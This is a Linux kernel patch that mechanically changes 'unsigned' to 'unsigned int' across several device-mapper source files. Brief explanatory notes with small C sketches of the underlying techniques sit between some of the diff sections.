+ 			if (unlikely(from_replay)) {
+-				if (unlikely(sec & (unsigned)(ic->sectors_per_block - 1))) {
++				if (unlikely(sec & (unsigned int)(ic->sectors_per_block - 1))) {
+ 					dm_integrity_io_error(ic, "invalid sector in journal", -EIO);
+ 					sec &= ~(sector_t)(ic->sectors_per_block - 1);
+ 				}
+@@ -2590,9 +2583,9 @@ skip_io:
+ static void integrity_writer(struct work_struct *w)
+ {
+ 	struct dm_integrity_c *ic = container_of(w, struct dm_integrity_c, writer_work);
+-	unsigned write_start, write_sections;
++	unsigned int write_start, write_sections;
+ 
+-	unsigned prev_free_sectors;
++	unsigned int prev_free_sectors;
+ 
+ 	spin_lock_irq(&ic->endio_wait.lock);
+ 	write_start = ic->committed_section;
+@@ -2639,12 +2632,12 @@ static void integrity_recalc(struct work_struct *w)
+ 	struct dm_io_region io_loc;
+ 	sector_t area, offset;
+ 	sector_t metadata_block;
+-	unsigned metadata_offset;
++	unsigned int metadata_offset;
+ 	sector_t logical_sector, n_sectors;
+ 	__u8 *t;
+-	unsigned i;
++	unsigned int i;
+ 	int r;
+-	unsigned super_counter = 0;
++	unsigned int super_counter = 0;
+ 
+ 	DEBUG_print("start recalculation... (position %llx)\n", le64_to_cpu(ic->sb->recalc_sector));
+ 
+@@ -2668,7 +2661,7 @@ next_chunk:
+ 	get_area_and_offset(ic, range.logical_sector, &area, &offset);
+ 	range.n_sectors = min((sector_t)RECALC_SECTORS, ic->provided_data_sectors - range.logical_sector);
+ 	if (!ic->meta_dev)
+-		range.n_sectors = min(range.n_sectors, ((sector_t)1U << ic->sb->log2_interleave_sectors) - (unsigned)offset);
++		range.n_sectors = min(range.n_sectors, ((sector_t)1U << ic->sb->log2_interleave_sectors) - (unsigned int)offset);
+ 
+ 	add_new_range_and_wait(ic, &range);
+ 	spin_unlock_irq(&ic->endio_wait.lock);
+@@ -2859,10 +2852,10 @@ static void bitmap_flush_work(struct work_struct *work)
+ }
+ 
+ 
+-static void init_journal(struct dm_integrity_c *ic, unsigned start_section,
+-			 unsigned n_sections, unsigned char commit_seq)
++static void init_journal(struct dm_integrity_c *ic, unsigned int start_section,
++			 unsigned int n_sections, unsigned char commit_seq)
+ {
+-	unsigned i, j, n;
++	unsigned int i, j, n;
+ 
+ 	if (!n_sections)
+ 		return;
+@@ -2885,7 +2878,7 @@ static void init_journal(struct dm_integrity_c *ic, unsigned start_section,
+ 	write_journal(ic, start_section, n_sections);
+ }
+ 
+-static int find_commit_seq(struct dm_integrity_c *ic, unsigned i, unsigned j, commit_id_t id)
++static int find_commit_seq(struct dm_integrity_c *ic, unsigned int i, unsigned int j, commit_id_t id)
+ {
+ 	unsigned char k;
+ 	for (k = 0; k < N_COMMIT_IDS; k++) {
+@@ -2898,11 +2891,11 @@ static int find_commit_seq(struct dm_integrity_c *ic, unsigned i, unsigned j, co
+ 
+ static void replay_journal(struct dm_integrity_c *ic)
+ {
+-	unsigned i, j;
++	unsigned int i, j;
+ 	bool used_commit_ids[N_COMMIT_IDS];
+-	unsigned max_commit_id_sections[N_COMMIT_IDS];
+-	unsigned write_start, write_sections;
+-	unsigned continue_section;
++	unsigned int max_commit_id_sections[N_COMMIT_IDS];
++	unsigned int write_start, write_sections;
++	unsigned int continue_section;
+ 	bool journal_empty;
+ 	unsigned char unused, last_used, want_commit_seq;
+ 
+@@ -3020,7 +3013,7 @@ brk:
+ 		ic->commit_seq = want_commit_seq;
+ 		DEBUG_print("continuing from section %u, commit seq %d\n", write_start, ic->commit_seq);
+ 	} else {
+-		unsigned s;
++		unsigned int s;
+ 		unsigned char erase_seq;
+ clear_journal:
+ 		DEBUG_print("clearing journal\n");
+@@ -3252,10 +3245,10 @@ static void dm_integrity_resume(struct dm_target *ti)
+ }
+ 
+ static void dm_integrity_status(struct dm_target *ti, status_type_t type,
+-				unsigned status_flags, char *result, unsigned maxlen)
++				unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	struct dm_integrity_c *ic = (struct dm_integrity_c *)ti->private;
+-	unsigned arg_count;
++	unsigned int arg_count;
+ 	size_t sz = 0;
+ 
+ 	switch (type) {
+@@ -3305,7 +3298,7 @@ static void dm_integrity_status(struct dm_target *ti, status_type_t type,
+ 		DMEMIT(" interleave_sectors:%u", 1U << ic->sb->log2_interleave_sectors);
+ 		DMEMIT(" buffer_sectors:%u", 1U << ic->log2_buffer_sectors);
+ 		if (ic->mode == 'J') {
+-			DMEMIT(" journal_watermark:%u", (unsigned)watermark_percentage);
++			DMEMIT(" journal_watermark:%u", (unsigned int)watermark_percentage);
+ 			DMEMIT(" commit_time:%u", ic->autocommit_msec);
+ 		}
+ 		if (ic->mode == 'B') {
+@@ -3384,7 +3377,7 @@ static void dm_integrity_io_hints(struct dm_target *ti, struct queue_limits *lim
+ 
+ static void calculate_journal_section_size(struct dm_integrity_c *ic)
+ {
+-	unsigned sector_space = JOURNAL_SECTOR_DATA;
++	unsigned int sector_space = JOURNAL_SECTOR_DATA;
+ 
+ 	ic->journal_sections = le32_to_cpu(ic->sb->journal_sections);
+ 	ic->journal_entry_size = roundup(offsetof(struct journal_entry, last_bytes[ic->sectors_per_block]) + ic->tag_size,
+@@ -3461,9 +3454,10 @@ static void get_provided_data_sectors(struct dm_integrity_c *ic)
+ 	}
+ }
+ 
+-static int initialize_superblock(struct dm_integrity_c *ic, unsigned journal_sectors, unsigned interleave_sectors)
++static int initialize_superblock(struct dm_integrity_c *ic,
++				 unsigned int journal_sectors, unsigned int interleave_sectors)
+ {
+-	unsigned journal_sections;
++	unsigned int journal_sections;
+ 	int test_bit;
+ 
+ 	memset(ic->sb, 0, SB_SECTORS << SECTOR_SHIFT);
+@@ -3548,7 +3542,7 @@ static void dm_integrity_set(struct dm_target *ti, struct dm_integrity_c *ic)
+ 
+ static void dm_integrity_free_page_list(struct page_list *pl)
+ {
+-	unsigned i;
++	unsigned int i;
+ 
+ 	if (!pl)
+ 		return;
+@@ -3557,10 +3551,10 @@ static void dm_integrity_free_page_list(struct page_list *pl)
+ 	kvfree(pl);
+ }
+ 
+-static struct page_list *dm_integrity_alloc_page_list(unsigned n_pages)
++static struct page_list *dm_integrity_alloc_page_list(unsigned int n_pages)
+ {
+ 	struct page_list *pl;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	pl = kvmalloc_array(n_pages + 1, sizeof(struct page_list), GFP_KERNEL | __GFP_ZERO);
+ 	if (!pl)
+@@ -3583,7 +3577,7 @@ static struct page_list *dm_integrity_alloc_page_list(unsigned n_pages)
+ 
+ static void dm_integrity_free_journal_scatterlist(struct dm_integrity_c *ic, struct scatterlist **sl)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	for (i = 0; i < ic->journal_sections; i++)
+ 		kvfree(sl[i]);
+ 	kvfree(sl);
+@@ -3593,7 +3587,7 @@ static struct scatterlist **dm_integrity_alloc_journal_scatterlist(struct dm_int
+ 								   struct page_list *pl)
+ {
+ 	struct scatterlist **sl;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	sl = kvmalloc_array(ic->journal_sections,
+ 			    sizeof(struct scatterlist *),
+@@ -3603,10 +3597,10 @@ static struct scatterlist **dm_integrity_alloc_journal_scatterlist(struct dm_int
+ 
+ 	for (i = 0; i < ic->journal_sections; i++) {
+ 		struct scatterlist *s;
+-		unsigned start_index, start_offset;
+-		unsigned end_index, end_offset;
+-		unsigned n_pages;
+-		unsigned idx;
++		unsigned int start_index, start_offset;
++		unsigned int end_index, end_offset;
++		unsigned int n_pages;
++		unsigned int idx;
+ 
+ 		page_list_location(ic, i, 0, &start_index, &start_offset);
+ 		page_list_location(ic, i, ic->journal_section_sectors - 1,
+@@ -3624,7 +3618,7 @@ static struct scatterlist **dm_integrity_alloc_journal_scatterlist(struct dm_int
+ 		sg_init_table(s, n_pages);
+ 		for (idx = start_index; idx <= end_index; idx++) {
+ 			char *va = lowmem_page_address(pl[idx].page);
+-			unsigned start = 0, end = PAGE_SIZE;
++			unsigned int start = 0, end = PAGE_SIZE;
+ 			if (idx == start_index)
+ 				start = start_offset;
+ 			if (idx == end_index)
+@@ -3711,7 +3705,7 @@ static int get_mac(struct crypto_shash **hash, struct alg_spec *a, char **error,
+ static int create_journal(struct dm_integrity_c *ic, char **error)
+ {
+ 	int r = 0;
+-	unsigned i;
++	unsigned int i;
+ 	__u64 journal_pages, journal_desc_size, journal_tree_size;
+ 	unsigned char *crypt_data = NULL, *crypt_iv = NULL;
+ 	struct skcipher_request *req = NULL;
+@@ -3738,7 +3732,7 @@ static int create_journal(struct dm_integrity_c *ic, char **error)
+ 		goto bad;
+ 	}
+ 	if (ic->journal_crypt_alg.alg_string) {
+-		unsigned ivsize, blocksize;
++		unsigned int ivsize, blocksize;
+ 		struct journal_completion comp;
+ 
+ 		comp.ic = ic;
+@@ -3827,7 +3821,7 @@ static int create_journal(struct dm_integrity_c *ic, char **error)
+ 			crypto_free_skcipher(ic->journal_crypt);
+ 			ic->journal_crypt = NULL;
+ 		} else {
+-			unsigned crypt_len = roundup(ivsize, blocksize);
++			unsigned int crypt_len = roundup(ivsize, blocksize);
+ 
+ 			req = skcipher_request_alloc(ic->journal_crypt, GFP_KERNEL);
+ 			if (!req) {
+@@ -3915,7 +3909,7 @@ static int create_journal(struct dm_integrity_c *ic, char **error)
+ 	}
+ 
+ 	for (i = 0; i < N_COMMIT_IDS; i++) {
+-		unsigned j;
++		unsigned int j;
+ retest_commit_id:
+ 		for (j = 0; j < i; j++) {
+ 			if (ic->commit_ids[j] == ic->commit_ids[i]) {
+@@ -3969,17 +3963,17 @@ bad:
+  *		journal_mac
+  *		recalculate
+  */
+-static int dm_integrity_ctr(struct dm_target *ti, unsigned argc, char **argv)
++static int dm_integrity_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ {
+ 	struct dm_integrity_c *ic;
+ 	char dummy;
+ 	int r;
+-	unsigned extra_args;
++	unsigned int extra_args;
+ 	struct dm_arg_set as;
+ 	static const struct dm_arg _args[] = {
+ 		{0, 18, "Invalid number of feature args"},
+ 	};
+-	unsigned journal_sectors, interleave_sectors, buffer_sectors, journal_watermark, sync_msec;
++	unsigned int journal_sectors, interleave_sectors, buffer_sectors, journal_watermark, sync_msec;
+ 	bool should_write_sb;
+ 	__u64 threshold;
+ 	unsigned long long start;
+@@ -4058,7 +4052,7 @@ static int dm_integrity_ctr(struct dm_target *ti, unsigned argc, char **argv)
+ 
+ 	while (extra_args--) {
+ 		const char *opt_string;
+-		unsigned val;
++		unsigned int val;
+ 		unsigned long long llval;
+ 		opt_string = dm_shift_arg(&as);
+ 		if (!opt_string) {
+@@ -4391,7 +4385,7 @@ try_smaller_buffer:
+ 	DEBUG_print("	journal_entries_per_sector %u\n", ic->journal_entries_per_sector);
+ 	DEBUG_print("	journal_section_entries %u\n", ic->journal_section_entries);
+ 	DEBUG_print("	journal_section_sectors %u\n", ic->journal_section_sectors);
+-	DEBUG_print("	journal_sections %u\n", (unsigned)le32_to_cpu(ic->sb->journal_sections));
++	DEBUG_print("	journal_sections %u\n", (unsigned int)le32_to_cpu(ic->sb->journal_sections));
+ 	DEBUG_print("	journal_entries %u\n", ic->journal_entries);
+ 	DEBUG_print("	log2_interleave_sectors %d\n", ic->sb->log2_interleave_sectors);
+ 	DEBUG_print("	data_device_sectors 0x%llx\n", bdev_nr_sectors(ic->dev->bdev));
+@@ -4465,8 +4459,8 @@ try_smaller_buffer:
+ 	}
+ 
+ 	if (ic->mode == 'B') {
+-		unsigned i;
+-		unsigned n_bitmap_pages = DIV_ROUND_UP(ic->n_bitmap_blocks, PAGE_SIZE / BITMAP_BLOCK_SIZE);
++		unsigned int i;
++		unsigned int n_bitmap_pages = DIV_ROUND_UP(ic->n_bitmap_blocks, PAGE_SIZE / BITMAP_BLOCK_SIZE);
+ 
+ 		ic->recalc_bitmap = dm_integrity_alloc_page_list(n_bitmap_pages);
+ 		if (!ic->recalc_bitmap) {
+@@ -4486,7 +4480,7 @@ try_smaller_buffer:
+ 		INIT_DELAYED_WORK(&ic->bitmap_flush_work, bitmap_flush_work);
+ 		for (i = 0; i < ic->n_bitmap_blocks; i++) {
+ 			struct bitmap_block_status *bbs = &ic->bbs[i];
+-			unsigned sector, pl_index, pl_offset;
++			unsigned int sector, pl_index, pl_offset;
+ 
+ 			INIT_WORK(&bbs->work, bitmap_block_work);
+ 			bbs->ic = ic;
+@@ -4523,7 +4517,7 @@ try_smaller_buffer:
+ 			goto bad;
+ 	}
+ 	if (ic->mode == 'B') {
+-		unsigned max_io_len = ((sector_t)ic->sectors_per_block << ic->log2_blocks_per_bitmap_bit) * (BITMAP_BLOCK_SIZE * 8);
++		unsigned int max_io_len = ((sector_t)ic->sectors_per_block << ic->log2_blocks_per_bitmap_bit) * (BITMAP_BLOCK_SIZE * 8);
+ 		if (!max_io_len)
+ 			max_io_len = 1U << 31;
+ 		DEBUG_print("max_io_len: old %u, new %u\n", ti->max_io_len, max_io_len);
+@@ -4594,7 +4588,7 @@ static void dm_integrity_dtr(struct dm_target *ti)
+ 	if (ic->journal_io_scatterlist)
+ 		dm_integrity_free_journal_scatterlist(ic, ic->journal_io_scatterlist);
+ 	if (ic->sk_requests) {
+-		unsigned i;
++		unsigned int i;
+ 
+ 		for (i = 0; i < ic->journal_sections; i++) {
+ 			struct skcipher_request *req = ic->sk_requests[i];
+diff --git a/drivers/md/dm-io-rewind.c b/drivers/md/dm-io-rewind.c
+index 0db53ccb94ba7..773c4cff8b89f 100644
+--- a/drivers/md/dm-io-rewind.c
++++ b/drivers/md/dm-io-rewind.c
+@@ -57,7 +57,7 @@ static void dm_bio_integrity_rewind(struct bio *bio, unsigned int bytes_done)
+ {
+ 	struct bio_integrity_payload *bip = bio_integrity(bio);
+ 	struct blk_integrity *bi = blk_get_integrity(bio->bi_bdev->bd_disk);
+-	unsigned bytes = bio_integrity_bytes(bi, bytes_done >> 9);
++	unsigned int bytes = bio_integrity_bytes(bi, bytes_done >> 9);
+ 
+ 	bip->bip_iter.bi_sector -= bio_integrity_intervals(bi, bytes_done >> 9);
+ 	dm_bvec_iter_rewind(bip->bip_vec, &bip->bip_iter, bytes);
+@@ -131,7 +131,7 @@ static inline void dm_bio_rewind_iter(const struct bio *bio,
+  * rewinding from end of bio and restoring its original position.
+  * Caller is also responsible for restoring bio's size.
+  */
+-static void dm_bio_rewind(struct bio *bio, unsigned bytes)
++static void dm_bio_rewind(struct bio *bio, unsigned int bytes)
+ {
+ 	if (bio_integrity(bio))
+ 		dm_bio_integrity_rewind(bio, bytes);
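The dm_bio_rewind() hunks above undo a partial advance by walking an iterator backwards through a vector of segments. Below is a minimal userspace sketch of that backwards walk, assuming nothing beyond standard C; struct seg and struct seg_iter are invented stand-ins for bio_vec and bvec_iter:

	#include <assert.h>
	#include <stddef.h>

	struct seg { size_t len; };

	struct seg_iter {
		size_t idx;	/* current segment */
		size_t done;	/* bytes already consumed inside segs[idx] */
	};

	static void seg_iter_rewind(const struct seg *segs, struct seg_iter *it,
				    size_t bytes)
	{
		while (bytes) {
			if (bytes <= it->done) {
				it->done -= bytes;	/* stay in this segment */
				return;
			}
			bytes -= it->done;		/* step back a whole segment */
			assert(it->idx > 0);
			it->idx--;
			it->done = segs[it->idx].len;
		}
	}

As in the kernel code, the caller is expected to restore the total size separately; the rewind only repositions the (index, offset) pair.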
+diff --git a/drivers/md/dm-io.c b/drivers/md/dm-io.c
+index 7835645334593..e488b05e35fa3 100644
+--- a/drivers/md/dm-io.c
++++ b/drivers/md/dm-io.c
+@@ -48,7 +48,7 @@ static struct kmem_cache *_dm_io_cache;
+ struct dm_io_client *dm_io_client_create(void)
+ {
+ 	struct dm_io_client *client;
+-	unsigned min_ios = dm_get_reserved_bio_based_ios();
++	unsigned int min_ios = dm_get_reserved_bio_based_ios();
+ 	int ret;
+ 
+ 	client = kzalloc(sizeof(*client), GFP_KERNEL);
+@@ -88,7 +88,7 @@ EXPORT_SYMBOL(dm_io_client_destroy);
+  * bi_private.
+  *---------------------------------------------------------------*/
+ static void store_io_and_region_in_bio(struct bio *bio, struct io *io,
+-				       unsigned region)
++				       unsigned int region)
+ {
+ 	if (unlikely(!IS_ALIGNED((unsigned long)io, DM_IO_MAX_REGIONS))) {
+ 		DMCRIT("Unaligned struct io pointer %p", io);
+@@ -99,7 +99,7 @@ static void store_io_and_region_in_bio(struct bio *bio, struct io *io,
+ }
+ 
+ static void retrieve_io_and_region_from_bio(struct bio *bio, struct io **io,
+-				       unsigned *region)
++				       unsigned int *region)
+ {
+ 	unsigned long val = (unsigned long)bio->bi_private;
+ 
+@@ -137,7 +137,7 @@ static void dec_count(struct io *io, unsigned int region, blk_status_t error)
+ static void endio(struct bio *bio)
+ {
+ 	struct io *io;
+-	unsigned region;
++	unsigned int region;
+ 	blk_status_t error;
+ 
+ 	if (bio->bi_status && bio_data_dir(bio) == READ)
+@@ -160,11 +160,11 @@ static void endio(struct bio *bio)
+  *---------------------------------------------------------------*/
+ struct dpages {
+ 	void (*get_page)(struct dpages *dp,
+-			 struct page **p, unsigned long *len, unsigned *offset);
++			 struct page **p, unsigned long *len, unsigned int *offset);
+ 	void (*next_page)(struct dpages *dp);
+ 
+ 	union {
+-		unsigned context_u;
++		unsigned int context_u;
+ 		struct bvec_iter context_bi;
+ 	};
+ 	void *context_ptr;
+@@ -177,9 +177,9 @@ struct dpages {
+  * Functions for getting the pages from a list.
+  */
+ static void list_get_page(struct dpages *dp,
+-		  struct page **p, unsigned long *len, unsigned *offset)
++		  struct page **p, unsigned long *len, unsigned int *offset)
+ {
+-	unsigned o = dp->context_u;
++	unsigned int o = dp->context_u;
+ 	struct page_list *pl = (struct page_list *) dp->context_ptr;
+ 
+ 	*p = pl->page;
+@@ -194,7 +194,7 @@ static void list_next_page(struct dpages *dp)
+ 	dp->context_u = 0;
+ }
+ 
+-static void list_dp_init(struct dpages *dp, struct page_list *pl, unsigned offset)
++static void list_dp_init(struct dpages *dp, struct page_list *pl, unsigned int offset)
+ {
+ 	dp->get_page = list_get_page;
+ 	dp->next_page = list_next_page;
+@@ -206,7 +206,7 @@ static void list_dp_init(struct dpages *dp, struct page_list *pl, unsigned offse
+  * Functions for getting the pages from a bvec.
+  */
+ static void bio_get_page(struct dpages *dp, struct page **p,
+-			 unsigned long *len, unsigned *offset)
++			 unsigned long *len, unsigned int *offset)
+ {
+ 	struct bio_vec bvec = bvec_iter_bvec((struct bio_vec *)dp->context_ptr,
+ 					     dp->context_bi);
+@@ -244,7 +244,7 @@ static void bio_dp_init(struct dpages *dp, struct bio *bio)
+  * Functions for getting the pages from a VMA.
+  */
+ static void vm_get_page(struct dpages *dp,
+-		 struct page **p, unsigned long *len, unsigned *offset)
++		 struct page **p, unsigned long *len, unsigned int *offset)
+ {
+ 	*p = vmalloc_to_page(dp->context_ptr);
+ 	*offset = dp->context_u;
+@@ -269,7 +269,7 @@ static void vm_dp_init(struct dpages *dp, void *data)
+  * Functions for getting the pages from kernel memory.
+  */
+ static void km_get_page(struct dpages *dp, struct page **p, unsigned long *len,
+-			unsigned *offset)
++			unsigned int *offset)
+ {
+ 	*p = virt_to_page(dp->context_ptr);
+ 	*offset = dp->context_u;
+@@ -293,15 +293,15 @@ static void km_dp_init(struct dpages *dp, void *data)
+ /*-----------------------------------------------------------------
+  * IO routines that accept a list of pages.
+  *---------------------------------------------------------------*/
+-static void do_region(const blk_opf_t opf, unsigned region,
++static void do_region(const blk_opf_t opf, unsigned int region,
+ 		      struct dm_io_region *where, struct dpages *dp,
+ 		      struct io *io)
+ {
+ 	struct bio *bio;
+ 	struct page *page;
+ 	unsigned long len;
+-	unsigned offset;
+-	unsigned num_bvecs;
++	unsigned int offset;
++	unsigned int num_bvecs;
+ 	sector_t remaining = where->count;
+ 	struct request_queue *q = bdev_get_queue(where->bdev);
+ 	sector_t num_sectors;
+@@ -508,7 +508,7 @@ static int dp_init(struct dm_io_request *io_req, struct dpages *dp,
+ 	return 0;
+ }
+ 
+-int dm_io(struct dm_io_request *io_req, unsigned num_regions,
++int dm_io(struct dm_io_request *io_req, unsigned int num_regions,
+ 	  struct dm_io_region *where, unsigned long *sync_error_bits)
+ {
+ 	int r;
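store_io_and_region_in_bio() above relies on struct io being aligned so that its low pointer bits are free to carry the region number. A self-contained sketch of that tagging trick, with MAX_REGIONS as an illustrative stand-in for DM_IO_MAX_REGIONS:

	#include <assert.h>
	#include <stdint.h>

	#define MAX_REGIONS 8	/* must be a power of two */

	static uintptr_t pack(void *obj, unsigned int region)
	{
		uintptr_t p = (uintptr_t)obj;

		assert((p & (MAX_REGIONS - 1)) == 0);	/* alignment frees the low bits */
		assert(region < MAX_REGIONS);
		return p | region;
	}

	static void unpack(uintptr_t val, void **obj, unsigned int *region)
	{
		*obj = (void *)(val & ~(uintptr_t)(MAX_REGIONS - 1));
		*region = val & (MAX_REGIONS - 1);
	}

Both values travel in one pointer-sized field (bi_private in dm-io), which is why the code checks IS_ALIGNED() before stuffing the region in.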
+diff --git a/drivers/md/dm-ioctl.c b/drivers/md/dm-ioctl.c
+index e031088ff15c6..37f5ea7337cc2 100644
+--- a/drivers/md/dm-ioctl.c
++++ b/drivers/md/dm-ioctl.c
+@@ -31,7 +31,7 @@ struct dm_file {
+ 	 * poll will wait until the global event number is greater than
+ 	 * this value.
+ 	 */
+-	volatile unsigned global_event_nr;
++	volatile unsigned int global_event_nr;
+ };
+ 
+ /*-----------------------------------------------------------------
+@@ -413,7 +413,7 @@ static struct mapped_device *dm_hash_rename(struct dm_ioctl *param,
+ 	struct hash_cell *hc;
+ 	struct dm_table *table;
+ 	struct mapped_device *md;
+-	unsigned change_uuid = (param->flags & DM_UUID_FLAG) ? 1 : 0;
++	unsigned int change_uuid = (param->flags & DM_UUID_FLAG) ? 1 : 0;
+ 	int srcu_idx;
+ 
+ 	/*
+@@ -1021,7 +1021,7 @@ static int dev_rename(struct file *filp, struct dm_ioctl *param, size_t param_si
+ 	int r;
+ 	char *new_data = (char *) param + param->data_start;
+ 	struct mapped_device *md;
+-	unsigned change_uuid = (param->flags & DM_UUID_FLAG) ? 1 : 0;
++	unsigned int change_uuid = (param->flags & DM_UUID_FLAG) ? 1 : 0;
+ 
+ 	if (new_data < param->data ||
+ 	    invalid_str(new_data, (void *) param + param_size) || !*new_data ||
+@@ -1096,7 +1096,7 @@ out:
+ static int do_suspend(struct dm_ioctl *param)
+ {
+ 	int r = 0;
+-	unsigned suspend_flags = DM_SUSPEND_LOCKFS_FLAG;
++	unsigned int suspend_flags = DM_SUSPEND_LOCKFS_FLAG;
+ 	struct mapped_device *md;
+ 
+ 	md = find_device(param);
+@@ -1125,7 +1125,7 @@ out:
+ static int do_resume(struct dm_ioctl *param)
+ {
+ 	int r = 0;
+-	unsigned suspend_flags = DM_SUSPEND_LOCKFS_FLAG;
++	unsigned int suspend_flags = DM_SUSPEND_LOCKFS_FLAG;
+ 	struct hash_cell *hc;
+ 	struct mapped_device *md;
+ 	struct dm_table *new_map, *old_map = NULL;
+@@ -1243,7 +1243,7 @@ static void retrieve_status(struct dm_table *table,
+ 	char *outbuf, *outptr;
+ 	status_type_t type;
+ 	size_t remaining, len, used = 0;
+-	unsigned status_flags = 0;
++	unsigned int status_flags = 0;
+ 
+ 	outptr = outbuf = get_result_buffer(param, param_size, &len);
+ 
+@@ -1648,8 +1648,8 @@ static int table_status(struct file *filp, struct dm_ioctl *param, size_t param_
+  * Returns a number <= 1 if message was processed by device mapper.
+  * Returns 2 if message should be delivered to the target.
+  */
+-static int message_for_md(struct mapped_device *md, unsigned argc, char **argv,
+-			  char *result, unsigned maxlen)
++static int message_for_md(struct mapped_device *md, unsigned int argc, char **argv,
++			  char *result, unsigned int maxlen)
+ {
+ 	int r;
+ 
+@@ -1859,7 +1859,7 @@ static int copy_params(struct dm_ioctl __user *user, struct dm_ioctl *param_kern
+ 	struct dm_ioctl *dmi;
+ 	int secure_data;
+ 	const size_t minimum_data_size = offsetof(struct dm_ioctl, data);
+-	unsigned noio_flag;
++	unsigned int noio_flag;
+ 
+ 	if (copy_from_user(param_kernel, user, minimum_data_size))
+ 		return -EFAULT;
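copy_params() above uses a two-stage read: fetch only the fixed header first, learn and validate the total size, then fetch the whole variable-sized payload. A hedged userspace sketch of the same pattern, with memcpy() standing in for copy_from_user() and struct hdr as a made-up analogue of struct dm_ioctl:

	#include <stddef.h>
	#include <stdint.h>
	#include <stdlib.h>
	#include <string.h>

	struct hdr {
		uint32_t data_size;	/* total size, header included */
		char data[];
	};

	static struct hdr *read_param(const void *user, size_t user_len)
	{
		const size_t min_size = offsetof(struct hdr, data);
		struct hdr h, *full;

		if (user_len < min_size)
			return NULL;
		memcpy(&h, user, min_size);		/* stage 1: header only */
		if (h.data_size < min_size || h.data_size > user_len)
			return NULL;			/* reject bogus sizes */
		full = malloc(h.data_size);
		if (!full)
			return NULL;
		memcpy(full, user, h.data_size);	/* stage 2: whole payload */
		return full;
	}

The size check between the two copies is the important part: the declared size must cover at least the header and never exceed what the caller actually provided.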
+diff --git a/drivers/md/dm-kcopyd.c b/drivers/md/dm-kcopyd.c
+index 4d3bbbea2e9a8..0ef78e56aa88c 100644
+--- a/drivers/md/dm-kcopyd.c
++++ b/drivers/md/dm-kcopyd.c
+@@ -34,14 +34,14 @@
+ #define DEFAULT_SUB_JOB_SIZE_KB 512
+ #define MAX_SUB_JOB_SIZE_KB     1024
+ 
+-static unsigned kcopyd_subjob_size_kb = DEFAULT_SUB_JOB_SIZE_KB;
++static unsigned int kcopyd_subjob_size_kb = DEFAULT_SUB_JOB_SIZE_KB;
+ 
+ module_param(kcopyd_subjob_size_kb, uint, S_IRUGO | S_IWUSR);
+ MODULE_PARM_DESC(kcopyd_subjob_size_kb, "Sub-job size for dm-kcopyd clients");
+ 
+-static unsigned dm_get_kcopyd_subjob_size(void)
++static unsigned int dm_get_kcopyd_subjob_size(void)
+ {
+-	unsigned sub_job_size_kb;
++	unsigned int sub_job_size_kb;
+ 
+ 	sub_job_size_kb = __dm_get_module_param(&kcopyd_subjob_size_kb,
+ 						DEFAULT_SUB_JOB_SIZE_KB,
+@@ -56,9 +56,9 @@ static unsigned dm_get_kcopyd_subjob_size(void)
+  *---------------------------------------------------------------*/
+ struct dm_kcopyd_client {
+ 	struct page_list *pages;
+-	unsigned nr_reserved_pages;
+-	unsigned nr_free_pages;
+-	unsigned sub_job_size;
++	unsigned int nr_reserved_pages;
++	unsigned int nr_free_pages;
++	unsigned int sub_job_size;
+ 
+ 	struct dm_io_client *io_client;
+ 
+@@ -119,7 +119,7 @@ static DEFINE_SPINLOCK(throttle_spinlock);
+ 
+ static void io_job_start(struct dm_kcopyd_throttle *t)
+ {
+-	unsigned throttle, now, difference;
++	unsigned int throttle, now, difference;
+ 	int slept = 0, skew;
+ 
+ 	if (unlikely(!t))
+@@ -182,7 +182,7 @@ static void io_job_finish(struct dm_kcopyd_throttle *t)
+ 		goto skip_limit;
+ 
+ 	if (!t->num_io_jobs) {
+-		unsigned now, difference;
++		unsigned int now, difference;
+ 
+ 		now = jiffies;
+ 		difference = now - t->last_jiffies;
+@@ -303,9 +303,9 @@ static void drop_pages(struct page_list *pl)
+ /*
+  * Allocate and reserve nr_pages for the use of a specific client.
+  */
+-static int client_reserve_pages(struct dm_kcopyd_client *kc, unsigned nr_pages)
++static int client_reserve_pages(struct dm_kcopyd_client *kc, unsigned int nr_pages)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	struct page_list *pl = NULL, *next;
+ 
+ 	for (i = 0; i < nr_pages; i++) {
+@@ -341,7 +341,7 @@ static void client_free_pages(struct dm_kcopyd_client *kc)
+ struct kcopyd_job {
+ 	struct dm_kcopyd_client *kc;
+ 	struct list_head list;
+-	unsigned flags;
++	unsigned int flags;
+ 
+ 	/*
+ 	 * Error state of the job.
+@@ -582,7 +582,7 @@ static int run_io_job(struct kcopyd_job *job)
+ static int run_pages_job(struct kcopyd_job *job)
+ {
+ 	int r;
+-	unsigned nr_pages = dm_div_up(job->dests[0].count, PAGE_SIZE >> 9);
++	unsigned int nr_pages = dm_div_up(job->dests[0].count, PAGE_SIZE >> 9);
+ 
+ 	r = kcopyd_get_pages(job->kc, nr_pages, &job->pages);
+ 	if (!r) {
+@@ -849,8 +849,8 @@ void dm_kcopyd_copy(struct dm_kcopyd_client *kc, struct dm_io_region *from,
+ EXPORT_SYMBOL(dm_kcopyd_copy);
+ 
+ void dm_kcopyd_zero(struct dm_kcopyd_client *kc,
+-		    unsigned num_dests, struct dm_io_region *dests,
+-		    unsigned flags, dm_kcopyd_notify_fn fn, void *context)
++		    unsigned int num_dests, struct dm_io_region *dests,
++		    unsigned int flags, dm_kcopyd_notify_fn fn, void *context)
+ {
+ 	dm_kcopyd_copy(kc, NULL, num_dests, dests, flags, fn, context);
+ }
+@@ -906,7 +906,7 @@ int kcopyd_cancel(struct kcopyd_job *job, int block)
+ struct dm_kcopyd_client *dm_kcopyd_client_create(struct dm_kcopyd_throttle *throttle)
+ {
+ 	int r;
+-	unsigned reserve_pages;
++	unsigned int reserve_pages;
+ 	struct dm_kcopyd_client *kc;
+ 
+ 	kc = kzalloc(sizeof(*kc), GFP_KERNEL);
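dm_get_kcopyd_subjob_size() above shows the usual dm pattern for writable module parameters: the value is re-read and clamped on every use, so a sysfs write of an out-of-range value can never take effect as written. A plain C sketch of that clamping, assuming the kernel helper's behavior (the real __dm_get_module_param() also uses READ_ONCE() and writes the clamped value back):

	static unsigned int get_clamped_param(unsigned int *param,
					      unsigned int def, unsigned int max)
	{
		unsigned int val = *param;

		if (!val)
			val = def;	/* 0 means "use the default" */
		if (val > max)
			val = max;
		return val;
	}

	/* usage, mirroring dm_get_kcopyd_subjob_size(): */
	static unsigned int subjob_size_kb = 512;
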